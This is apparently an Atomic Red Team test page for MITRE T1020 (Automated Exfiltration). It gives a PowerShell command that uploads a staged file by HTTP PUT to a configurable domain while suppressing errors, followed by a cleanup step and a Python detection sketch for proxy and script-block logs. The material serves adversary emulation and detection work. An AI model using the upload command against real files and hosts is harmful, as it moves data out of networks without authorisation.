# T1020 - Automated Exfiltration

Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.

When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over C2 Channel and Exfiltration Over Alternative Protocol.

## Atomic Tests

### Atomic Test #1 - IcedID Botnet HTTP PUT

- Creates a text file
- Tries to upload it to a server via the HTTP PUT method with a Content-Type header
- Deletes the created file

Supported Platforms: Windows

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file | Exfiltration File | String | C:\temp\T1020_exfilFile.txt |
| domain | Destination Domain | url | https://google.com |

Attack Commands: Run with powershell!

```powershell
# #{file} and #{domain} are Atomic Red Team input placeholders, replaced at run time
$fileName = "#{file}"
$url = "#{domain}"
# Create (or overwrite) the file that will be uploaded
$file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
$contentType = "application/octet-stream"
# Upload the file body via HTTP PUT; the empty catch deliberately swallows any
# error so the test completes even when the destination rejects the request
try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}
```

Cleanup Commands:

```powershell
$fileName = "#{file}"
# Remove the staged file; ignore the error if it was never created
Remove-Item -Path $fileName -ErrorAction Ignore
```
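The test above produces two observable artifacts a defender can key on: an outbound PUT with a `Content-Type: application/octet-stream` body to an arbitrary host, and (with PowerShell Script Block Logging enabled) an `Invoke-WebRequest ... -Method Put ... -InFile` script block in Event ID 4104. The following detection sketch is an added example written for this page; it is not part of Atomic Red Team. The proxy log line format, the sample log lines, the script block text and the `INTERNAL_UPLOAD_HOSTS` allow-list are all constructed assumptions and should be adapted to the proxy product and logging pipeline actually in use.

```python
"""Detection sketch for the HTTP PUT upload behaviour exercised by Atomic Test #1.

Two independent detections, both run over constructed sample data:
  1. Egress proxy log: PUT/POST carrying application/octet-stream to a host that
     is not on the organisation's upload allow-list.
  2. PowerShell Script Block Logging (Event ID 4104) text: Invoke-WebRequest or
     an alias, a PUT method, and an -InFile argument in the same block.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed proxy log lines (not real traffic). Assumed field layout:
# timestamp client_ip method url content_type bytes_sent
PROXY_LOG = """\
2024-01-01T10:00:01Z 10.0.0.5 GET https://updates.example.com/manifest.json - 0
2024-01-01T10:00:02Z 10.0.0.5 PUT https://google.com/ application/octet-stream 40
2024-01-01T10:00:03Z 10.0.0.7 POST https://intranet.example.com/upload application/octet-stream 2048
2024-01-01T10:00:04Z 10.0.0.9 PUT https://files.example.com/a.bin application/octet-stream 4096
"""

# Hosts where binary uploads are expected (assumed allow-list for this example).
INTERNAL_UPLOAD_HOSTS = {"intranet.example.com", "files.example.com"}

PROXY_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "
    r"(?P<ctype>\S+) (?P<bytes>\d+)$"
)


@dataclass(frozen=True)
class Alert:
    source: str
    detail: str


def detect_octet_stream_upload(log_text: str) -> list[Alert]:
    """Flag PUT/POST requests with an octet-stream body to non-allow-listed hosts."""
    alerts = []
    for line in log_text.splitlines():
        m = PROXY_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash the pipeline
        if m["method"] not in {"PUT", "POST"}:
            continue
        if m["ctype"].lower() != "application/octet-stream":
            continue
        host = urlparse(m["url"]).hostname or ""
        if host in INTERNAL_UPLOAD_HOSTS:
            continue
        alerts.append(
            Alert("proxy", f"{m['client']} {m['method']} {m['bytes']}B octet-stream to {host}")
        )
    return alerts


# Constructed script-block texts, as Event ID 4104 would carry them.
SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\temp | Select-Object Name",
    "Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName",
    'Invoke-RestMethod -Uri "https://api.example.com/x" -Method Get',
]

# iwr, irm, curl and wget are Windows PowerShell aliases of the web cmdlets.
IWR_RE = re.compile(r"\b(Invoke-WebRequest|Invoke-RestMethod|iwr|irm|curl|wget)\b", re.I)
# PowerShell accepts unambiguous parameter prefixes, so -Me and -InF are also matched.
PUT_RE = re.compile(r"-Me(?:thod)?\s+['\"]?Put\b", re.I)
INFILE_RE = re.compile(r"-InF(?:ile)?\b", re.I)


def detect_powershell_put_upload(blocks: list[str]) -> list[Alert]:
    """Flag script blocks that upload a local file with a PUT via the web cmdlets."""
    return [
        Alert("ps_4104", b)
        for b in blocks
        if IWR_RE.search(b) and PUT_RE.search(b) and INFILE_RE.search(b)
    ]


if __name__ == "__main__":
    for alert in detect_octet_stream_upload(PROXY_LOG) + detect_powershell_put_upload(SCRIPT_BLOCKS):
        print(f"[{alert.source}] {alert.detail}")
```

The proxy rule is the more robust of the two because it does not depend on the uploader being PowerShell at all; the allow-list is what keeps it from firing on legitimate internal file services. The script-block rule catches the exact command shape of this test, including abbreviated parameter names, but only when Script Block Logging is turned on via policy.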